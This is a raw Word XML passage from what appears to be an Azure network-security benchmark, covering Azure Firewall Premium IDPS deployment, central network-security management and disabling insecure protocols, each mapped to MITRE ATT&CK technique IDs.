      </w:r>
    </w:p>
    <w:p w14:paraId="18DB96F3" w14:textId="6D1A903C" w:rsidR="00396C5D" w:rsidRDefault="0040536F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422048CD" w14:textId="6AC33F92" w:rsidR="00121B9B" w:rsidRPr="00E53977" w:rsidRDefault="00121B9B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121B9B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCC876" w14:textId="06DE7DE7" w:rsidR="0040536F" w:rsidRDefault="0040536F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47193EC7" w14:textId="6638136A" w:rsidR="00121B9B" w:rsidRPr="00E53977" w:rsidRDefault="00121B9B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121B9B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1059 - Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3ACC88" w14:textId="64E2BAA5" w:rsidR="0040536F" w:rsidRDefault="0040536F" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54A5CA" w14:textId="7C39B43E" w:rsidR="00121B9B" w:rsidRDefault="00121B9B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121B9B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1071 - Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD2BF8" w14:textId="1F4F7D1B" w:rsidR="008C0F53" w:rsidRDefault="007A4041" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542EFBDC" w14:textId="48726869" w:rsidR="00121B9B" w:rsidRPr="00E53977" w:rsidRDefault="00121B9B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121B9B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E28D1" w14:textId="316CE6F9" w:rsidR="007A4041" w:rsidRDefault="007A4041" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364196D9" w14:textId="4607D1A9" w:rsidR="00121B9B" w:rsidRPr="00E53977" w:rsidRDefault="00121B9B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121B9B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1041 - Exfiltration Over C2 Channel</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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall Premium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB0BD4" w14:textId="5F40DC96" w:rsidR="00976457" w:rsidRPr="00E53977" w:rsidRDefault="00976457" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Azure Firewall Premium with Premium Policy in your hub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable IDPS capabilities alongside other advanced features like TLS inspection and URL filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0980C" w14:textId="651494CE" w:rsidR="008B3725" w:rsidRPr="00E53977" w:rsidRDefault="008B3725" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Select IDPS signature rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C32E68" w14:textId="32644859" w:rsidR="000C71D9" w:rsidRPr="00E53977" w:rsidRDefault="000C71D9" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure IDPS mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49915AE3" w14:textId="3EE540F8" w:rsidR="006545D3" w:rsidRPr="00E53977" w:rsidRDefault="006545D3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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6E36324C" w:rsidR="00E81F50" w:rsidRPr="00E53977" w:rsidRDefault="00E81F50" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Fine-tune signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3A55A" w14:textId="3AFBDA58" w:rsidR="00E81F50" w:rsidRPr="00E53977" w:rsidRDefault="00E81F50" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="108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2" w:name="_Toc242449475"/>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>NS-7: Manage network security centrally and effectively</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="60F039CF" w14:textId="5DEA8857" w:rsidR="00EB7E1B" w:rsidRPr="00E53977" w:rsidRDefault="00EB7E1B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183AF715" w14:textId="10AE3CB2" w:rsidR="004B575E" w:rsidRDefault="004B575E" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD54F2A" w14:textId="679BD4CA" w:rsidR="004B575E" w:rsidRPr="00E53977" w:rsidRDefault="004B575E" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Inconsistent policy enforcement and misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F631A5" w14:textId="1E3CC02A" w:rsidR="009048E1" w:rsidRPr="00A92251" w:rsidRDefault="004B575E" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">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596CFD8" w14:textId="79AFF6E1" w:rsidR="008B0A05" w:rsidRPr="00E53977" w:rsidRDefault="008B0A05" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Reduced visibility and delayed response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364C7AC" w14:textId="0A361AEE" w:rsidR="008B0A05" w:rsidRPr="00E53977" w:rsidRDefault="008B0A05" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Inadequate central management complicates efforts to consistently meet regulatory and industry standards, risking non-compliance and potential penalties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A27290" w14:textId="2F88F890" w:rsidR="005A7037" w:rsidRPr="00E53977" w:rsidRDefault="005A7037" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0832E9E5" w14:textId="06BFF12B" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34898CB7" w14:textId="781F110F" w:rsidR="00A92251" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A963E" w14:textId="14A662A1" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1133 - External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317D8FC" w14:textId="4F8C0BEB" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AB2DE" w14:textId="4D75A58A" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1562 - Impair Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D21B30" w14:textId="64FC9E54" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A7C77" w14:textId="3231BCD9" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C396F0E" w14:textId="647FD997" w:rsidR="005A7037" w:rsidRDefault="005A7037" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D5E99" w14:textId="28BBF22B" w:rsidR="00A92251" w:rsidRPr="00E53977" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1071 - Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9434AC" w14:textId="5219EED5" w:rsidR="00642845" w:rsidRDefault="00642845" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-7.1: Manage network security centrally and effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE75E6F" w14:textId="78EBD17C" w:rsidR="00A92251" w:rsidRPr="00A92251" w:rsidRDefault="00A92251" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A92251">
        <w:t>Use Azure's centralized tools and standardized practices to simplify and scale network-security management, ensuring consistent enforcement, reduced misconfiguration, and improved monitoring. Implement centralized policy enforcement, standardize firewall and routing management, enable comprehensive monitoring and analytics, and maintain resource consistency through governance practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9EBD96" w14:textId="5BD7D5F9" w:rsidR="004F2A66" w:rsidRPr="00E53977" w:rsidRDefault="004F2A66" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement centralized policy enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE14E2" w14:textId="1B091096" w:rsidR="00CB27F3" w:rsidRDefault="004F2A66" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Standardize firewall and routing management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F75DD3" w14:textId="337A4F47" w:rsidR="00FC4756" w:rsidRPr="00E53977" w:rsidRDefault="00FC4756" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>routing intent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5A374" w14:textId="7659FC2A" w:rsidR="00237747" w:rsidRPr="00E53977" w:rsidRDefault="00237747" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable comprehensive monitoring and analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05B6AC" w14:textId="0A2F83E6" w:rsidR="00237747" w:rsidRPr="00E53977" w:rsidRDefault="00237747" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Maintain resource consistency and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CE108" w14:textId="7C9660D4" w:rsidR="00A226F7" w:rsidRPr="00E53977" w:rsidRDefault="00A226F7" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply CAF naming conventions and mandatory resource tags to all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>,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3" w:name="_Toc242449476"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-8: Detect and disable insecure services and protocols</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0583E4DC" w14:textId="7EBC6F65" w:rsidR="002A6886" w:rsidRPr="00E53977" w:rsidRDefault="002A6886" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229480AF" w14:textId="6E295146" w:rsidR="002A6886" w:rsidRPr="00E53977" w:rsidRDefault="002A6886" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
